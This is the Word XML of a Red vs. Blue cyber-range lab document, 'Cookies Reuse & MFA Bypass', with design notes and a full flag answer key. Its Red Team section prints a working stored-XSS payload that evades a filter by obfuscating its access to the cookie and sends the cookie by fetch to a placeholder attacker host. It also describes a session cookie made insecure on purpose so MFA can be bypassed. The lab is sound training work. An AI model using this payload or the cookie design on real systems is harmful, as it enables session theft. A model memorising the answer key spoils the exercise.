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Practical Assessment — Cyber Range Engineering (Red vs. Blue Lab)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Cookies Reuse &amp; MFA Bypass”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yudi Kurniawan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Date"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">October 2026</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="1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document accompanies the Git repository for the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cookies Reuse &amp; MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cyber-range lab —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https://github.com/iduy01/naulidata-cyberrange</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">It explains the design, how each requirement in the brief is implemented, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">provides the full</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SCENARIO75{...}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">answer key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The lab is a self-contained Red vs. Blue CTF containerised with Docker Compose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and deployable inside a single Linux VM on a Proxmox hypervisor. It consists of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a vulnerable Node.js web application (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Admin Feedback System”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), a simulated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">administrator bot that reviews the feedback dashboard (which is what makes the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stored XSS fire), and a Blue Team SSH foothold that exposes shared Nginx-style</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The core flaw being taught is a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">session-token issuance defect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cookie that (a) is not HttpOnly, (b) never expires, and (c) is a bearer token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that is never bound to the client nor re-checked against the MFA state. Any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stolen cookie can therefore be replayed to bypass MFA entirely.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="infrastructure-deployment"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Infrastructure &amp;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+ Docker/Docker Compose, deployable as one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with three services (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provision.sh</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">installs Docker, builds and starts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network zone</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">feedback.admin.local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provision.sh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feedback.admin.local → 127.0.0.1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/etc/hosts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 on HTTP port</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">3075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publishes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">3075:3075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on custom port</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">2275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analyst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blue_team_rocks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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(linuxserver/openssh-server) publishes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">2275:2222</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">with that user/password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shared with the Blue Team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./logs</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">bind mount is attached at</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/opt/admin/logs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sshd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="15" w:name="Xd4d3f7201149d8320b6eebac9279784faea4bbe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Vulnerable Application — Red Team Attack Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Backend:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Node.js + Express</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The application exposes the stack via a custom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Powered-By: Node.js (Express)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">header and writes Nginx-style access logs plus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an application error log.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="12" w:name="phase-1-reconnaissance"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 1 — Reconnaissance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2709"/>
        <w:gridCol w:w="3334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X-Powered-By</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">exposes backend tech</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">custom response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SCENARIO75{Node.js}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disallows the MFA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Disallow: /api/verify-mfa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SCENARIO75{/api/verify-mfa}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Restricted admin area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SCENARIO75{/dashboard}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ASCII-art comment hints at robots.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HTML comment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SCENARIO75{robots.txt}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Pre-auth session cookie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Set-Cookie: pre_mfa_session=...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SCENARIO75{pre_mfa_session}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Pre-auth session cookie value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">value issued on first visit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SCENARIO75{pending_mfa_verification}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="phase-2-defense-evasion-waf-xss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 2 — Defense Evasion (WAF &amp; XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The feedback endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/feedback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POST-only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(GET returns 405). A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rudimentary WAF inspects the request body and returns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when it matches</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the raw keywords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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie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. This forces three</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">specific attacker adaptations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">an HTML5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;svg onload="..."&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">element instead of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bracket-notation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cookie access to avoid the raw keyword:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">window['docu'+'ment']['coo'+'kie']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fetch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">API to exfiltrate the value (no CSP restrictions).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pre_mfa_session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cookie is issued with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly=False</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so the payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">can read it from JavaScript.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4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Feedback endpoint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SCENARIO75{POST}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WAF block response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SCENARIO75{403}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HTML5 element used to bypass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SCENARIO75{&lt;svg&gt;}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Obfuscated cookie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SCENARIO75{window['docu'+'ment']['coo'+'kie']}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pre_mfa_session</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">HttpOnly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SCENARIO75{False}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Exfiltration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SCENARIO75{fetch}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Working bypass payload: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onload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"fetch('http://ATTACKER:8899/?c='+encodeURIComponent(window['docu'+'ment']['coo'+'kie']))"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="Xc6f90992835781de9fc3dee0bb8245cb47addc2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 3 — Initial Access (MFA bypass &amp; session replay)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When the administrator opens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 the stored payload executes in the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">admin’s authenticated browser and ships the cookie bundle (including the admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">session token) to the attacker. The backend accepts an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">adm_sess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bearer token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">based on validity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— it never re-verifies the MFA state — so replaying</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the stolen cookie skips</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/verify-mfa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">completely. The dashboards renders the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reflected payload inside</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;div class="xss-payload"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and displays the final flag.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4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MFA endpoint skipped on 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SCENARIO75{/api/verify-mfa}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Authenticated session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SCENARIO75{adm_sess}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Reflected-XSS container CSS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SCENARIO75{xss-payload}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Red Team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SCENARIO75{RED_C00k13_MFA_Byp4ss_0wn3d}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="19" w:name="telemetry-log-forensics-blue-team-path"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Telemetry &amp; Log Forensics — Blue Team Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The environment writes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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Nginx combined format with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error.log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/opt/admin/logs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scripts/inject_logs.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seeds a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">realistic attack story at deploy time (invoked automatically by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inside the application container).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="16" w:name="phase-1-log-forensics"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 1 — Log Forensics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4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Log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SCENARIO75{/opt/admin/logs}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Attacker source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SCENARIO75{10.10.14.50}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Attacker User-Agent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SCENARIO75{Mozilla/5.0}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Status for the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SCENARIO75{200}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Timestamp of that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SCENARIO75{18:51:55}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Base64 string in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SCENARIO75{UEhBTlRPTUdSSUR7QkxVRV9MMGdfSHVudDNyX000c3Qzcn0}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:id="17" w:name="phase-2-threat-hunting"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 2 — Threat Hunting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4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Baseline legitimate admin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SCENARIO75{192.168.1.100}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Attacker subnet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SCENARIO75{10.10.14.0/24}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File recording WAF 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SCENARIO75{/opt/admin/logs/error.log}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First blocked WAF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SCENARIO75{&lt;script&gt;}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Timestamp of the first WAF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SCENARIO75{18:50:15}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Did the attacker reach the MFA endpoint?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SCENARIO75{No}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="phase-3-incident-response"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 3 — Incident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4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Encoding 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SCENARIO75{Base64}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Encoded-string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SCENARIO75{44}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Severity for cookie-reuse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SCENARIO75{CRITICAL}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Anomaly-entry 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SCENARIO75{18:53:10}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Exact warning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SCENARIO75{Authentication bypass anomaly}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Blue Team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SCENARIO75{BLUE_L0G_HUnt3r_M4st3r}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkStart w:id="20" w:name="verification-checklists"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Verification Checklists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team (proof the lab functions)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X-Powered-By: Node.js (Express)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">present on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disallows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/verify-mfa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&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">payload → HTTP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(WAF works)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&lt;svg onload&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ bracket-notation payload → HTTP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(WAF bypassed)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adm_sess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stolen via the stored payload and replayed →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/api/verify-mfa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">never contacted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Final flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SCENARIO75{RED_C00k13_MFA_Byp4ss_0wn3d}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rendered on the dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Blue Team (proof the telemetry tells the story)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access.log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error.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">readable over SSH at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/admin/logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.14.50</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(UA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla/5.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) traceable across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/api/feedback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18:50:15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(WAF) and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18:51:55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Base64 value in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decodes to the final Blue flag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error.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CRITICAL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Authentication bypass anomaly”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18:53:10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No access by the attacker to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/verify-mfa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(MFA was bypassed, not solved)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="Xb0a8eb5d4eb9efe5549cee05a9e0d8de103391c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Assessment Note — Base64 Length Discrepancy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The brief states the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Base64 string is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">44 characters</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">decodes to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SCENARIO75{BLUE_L0G_HUnt3r_M4st3r}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The literal string supplied in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the brief is in fact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">47 characters</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and decodes to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PHANTOMGRID{BLUE_L0g_Hunt3r_M4st3r}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echo 'UEhBTlRPTUdSSUR7QkxVRV9MMGdfSHVudDNyX000c3Qzcn0=' | base64 -d</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PHANTOMGRID{BLUE_L0g_Hunt3r_M4st3r}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To keep the Blue Team’s answer aligned with the brief, the lab stores the string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">exactly as written in the brief</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A padding-valid alternative encoding the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
